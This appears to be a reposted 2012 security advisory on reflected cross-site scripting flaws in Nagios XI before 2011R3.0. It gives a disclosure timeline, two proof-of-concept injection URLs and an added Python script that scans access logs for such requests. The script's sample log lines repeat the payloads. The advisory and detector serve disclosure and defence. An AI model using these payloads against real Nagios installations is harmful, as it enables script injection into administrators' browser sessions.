SECURITYVULNS:DOC:28177
Jun 18, 2012 - 12:00 a.m.


================
0A29-12-1 : Cross-Site Scripting vulnerabilities in Nagios XI < 2011R3.0

Author: 0a29406d9794e4f9b30b3c5d6702c708

twitter.com/0a29 - 0a29.blogspot.com - GMail 0a2940

================
Description:

Multiple reflected XSS vulnerabilities exist in Nagios XI < 2011R3.0.

Fixes are detailed in
http://assets.nagios.com/downloads/nagiosxi/CHANGES-2011.TXT

================
Timeline:

16 May 2012 - Reported to Nagios Enterprises
16 May 2012 - Acknowledged
16 May 2012 - Reported fixed
04 June 2012 - Nagios XI 2011R3.0 released
14 June 2012 - Public disclosure

================
Details:

Page: /includes/components/graphexplorer/visApi.php
POC: http://site/nagiosxi/includes/components/graphexplorer/visApi.php?type=bar&div=</script><script>alert('0a29')</script>&opt=topalerts

Page: /nagiosxi/perfgraphs/index.php
POC: http://site/nagiosxi/perfgraphs/index.php?view='><script>alert('0a29')</script>&start=&end=&startdate=&enddate=
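
================
Detection example (added here, not part of the original advisory):

One way to check web server access logs for requests shaped like the two PoCs above, on hosts that ran a release older than 2011R3.0. The combined log format, the sample lines and the name suspicious_requests are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Path suffix -> query parameter used in the advisory's PoC for that page.
WATCHED = {
    "/includes/components/graphexplorer/visApi.php": "div",
    "/perfgraphs/index.php": "view",
}
# Characters needed to close a script block or a quoted attribute.
MARKUP = re.compile(r"[<>'\"]")
# Request field of a combined-format access log line (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines; addresses are from the documentation range.
SAMPLE_LOG = [
    '192.0.2.10 - - [14/Jun/2012:10:00:01 +0000] "GET /nagiosxi/perfgraphs/index.php?view=1&start=&end= HTTP/1.1" 200 5120',
    '192.0.2.11 - - [14/Jun/2012:10:00:05 +0000] "GET /nagiosxi/perfgraphs/index.php?view=%27%3E%3Cscript%3Ealert(%270a29%27)%3C/script%3E&start=&end= HTTP/1.1" 200 5300',
    '192.0.2.10 - - [14/Jun/2012:10:00:09 +0000] "GET /nagiosxi/includes/components/graphexplorer/visApi.php?type=bar&div=chart1&opt=topalerts HTTP/1.1" 200 880',
    '192.0.2.11 - - [14/Jun/2012:10:00:12 +0000] "GET /nagiosxi/includes/components/graphexplorer/visApi.php?type=bar&div=%3C/script%3E%3Cscript%3Ealert(%270a29%27)%3C/script%3E&opt=topalerts HTTP/1.1" 200 900',
    '192.0.2.12 - - [14/Jun/2012:10:00:20 +0000] "GET /nagiosxi/other.php?view=%3Cb%3E HTTP/1.1" 404 210',
]

def suspicious_requests(log_lines):
    """Return (line_no, parameter, decoded_value) for each flagged request."""
    hits = []
    for line_no, line in enumerate(log_lines, start=1):
        match = REQUEST.search(line)
        if not match:
            continue  # not a request line in the assumed format
        url = urlsplit(match.group(1))
        for suffix, param in WATCHED.items():
            if not url.path.endswith(suffix):
                continue
            # parse_qs percent-decodes, so %3C and < are treated alike.
            for value in parse_qs(url.query).get(param, []):
                if MARKUP.search(value):
                    hits.append((line_no, param, value))
    return hits

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```

A hit is only an indicator that such a request was received; the fix remains the upgrade to 2011R3.0 listed in the timeline.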